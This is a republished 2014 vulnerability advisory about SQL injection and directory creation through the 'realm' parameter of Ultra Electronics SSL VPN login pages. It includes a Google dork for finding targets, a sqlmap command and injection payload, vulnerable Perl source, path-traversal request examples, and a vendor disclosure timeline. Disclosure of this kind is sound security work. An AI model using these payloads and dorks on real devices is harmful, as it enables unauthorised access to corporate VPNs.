首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Ultra Electronics SSL VPN 7.2.0.19 / 7.4.0.7 SQL Injection / Directory Creation
来源:http://www.osisecurity.com.au. 作者:Webster 发布时间:2014-10-08  
Ultra Electronics / AEP Networks - SSL VPN (Netilla / Series A / Ultra
Protect) Vulnerabilities
  
Release Date:
 02-Oct-2014
  
Software:
 Ultra Electronics - Series A
  
Versions tested:
 Version 7.2.0.19 and 7.4.0.7 have been confirmed as vulnerable. Other
versions untested.
  
Google Dork: inurl:/preauth/login.cgi
Page 1 of about 321 results (0.25 seconds)
  
URL:
  
https://[target]/preauth/login.cgi?realm=local
  
There are a few different issues with the 'realm' parameter.
  
1) SQL injection. You can use sqlmap for this.
  
./sqlmap.py -u "https://[target]/preauth/login.cgi?realm=abc" --level 5
  
sqlmap identified the following injection points with a total of 927
HTTP(s) requests:
---
Place: GET
Parameter: realm
    Type: boolean-based blind
    Title: PostgreSQL stacked conditional-error blind queries
    Payload: realm=-2661'); SELECT (CASE WHEN (9569=9569) THEN 9569
ELSE 1/(SELECT 0) END);--
---
  
web application technology: Apache
back-end DBMS operating system: Linux Red Hat
back-end DBMS: PostgreSQL
banner:    'PostgreSQL 8.3.4 on x86_64-redhat-linux-gnu, compiled by
GCC gcc (GCC) 4.1.2 20070626 (Red Hat 4.1.2-14)'
  
Funnily enough, a lot of the source code is commented with things like
"#FIXME add param validation" as a reminder by the developer that the
code doesn't validate input - but somehow made it into production.
  
DB.pm line ~189 where realm is used in an SQL select:
  
sub set_message {
    my $self = shift;
    warn(__PACKAGE__, "::set_message() called\n") if $self->{'debug'};
  
    my ($key, $value) = @_; # FIXME add param validation
  
    my $realm_name=$self->{'realm'};
    my $c = $self->{'_dbh'};
    my $locale = $self->{'locale'} ;
    my $r      = $c->exec("
                select * from set_realm_message('$realm_name',
'$locale', '$key', '$value')
                ");
    if ($r->resultStatus ne PGRES_TUPLES_OK) {
        return;
    }
    my $retval = $r->fetchrow;
    return $retval;
  
}
  
2) The realm is also used in a perl based mkdir(). This allows you to
create arbitrary folders, allows for path disclosure / checking files
exist etc.
  
Manager.pm line ~43:
chown $uid, $gid, mkpath($path, 0);
  
File.pm line ~160:
my $parent = File::Basename::dirname($path);
    unless (-d $parent or $path eq $parent) {
        push(@created,mkpath($parent, $verbose, $mode));
     }
    print "mkdir $path\n" if $verbose;
  
Examples:
  
https://[target]/preauth/login.cgi?realm=../../../etc/hosts
  
Error
mkdir /tmp/netilla-cache/C11N_get_messages/../../../etc/hosts: File
exists at /usr/lib/perl5/site_perl/5.8.8/Netilla/CONDA/Cache/Manager.pm
line 43
Back
  
https://[target]/preauth/login.cgi?realm=../../../../bin/
  
Error
mkdir /tmp/netilla-cache/C11N_get_messages/../../../../bin: Permission
denied at /usr/lib/perl5/site_perl/5.8.8/Netilla/CONDA/Cache/Manager.pm
line 43
Back
  
The portal requires authentication to access "protected" areas but
once you are authenticated, you can HTTP GET internal device
configuration files and other resources that an authenticated user
shouldn't be able to read.
  
Credit:
 This vulnerability was discovered by Patrick Webster.
  
Disclosure timeline:
 28-May-2012 - Discovered during test.
 28-May-2012 - Vendor contact, referred to support and legal departments.
 19-Jun-2012 - Requested vendor update.
 20-Jun-2012 - Told to contact support email. Sent.
 19-Jul-2012 - Support request to close ticket. Told support no
progress has been made. Support requires CVE to progress.
 23-Jul-2012 - Told support no CVE has been assigned. Support refuse
to investigate without a CVE. Told to upgrade to newest release
7.4.0.7. Confirmed as affected.
 14-Aug-2012 - Vendor support closing ticket, no investigation or patch.
 02-Oct-2014 - Public disclosure. Assumed vulnerable.
  
 Note: Product is now known as NetillaOS by Northbridge Secure
Systems. 2014 status unknown.

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·TeamSpeak Client 3.0.14 - Buff
·XAMPP 1.8.x Multiple Vulnerabi
·Adobe Flash 14.0.0.145 copyPix
·Asx to Mp3 2.7.5 - Stack Overf
·Internet Explorer 8 - Fixed Co
·ManageEngine OpManager / Socia
·Microsoft Exchange IIS HTTP In
·HP Network Node Manager I PMD
·bash代码注入的安全漏洞
·Pure-FTPd External Authenticat
·Dhclient Bash Environment Vari
·GNU bash 4.3.11 Environment Va
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved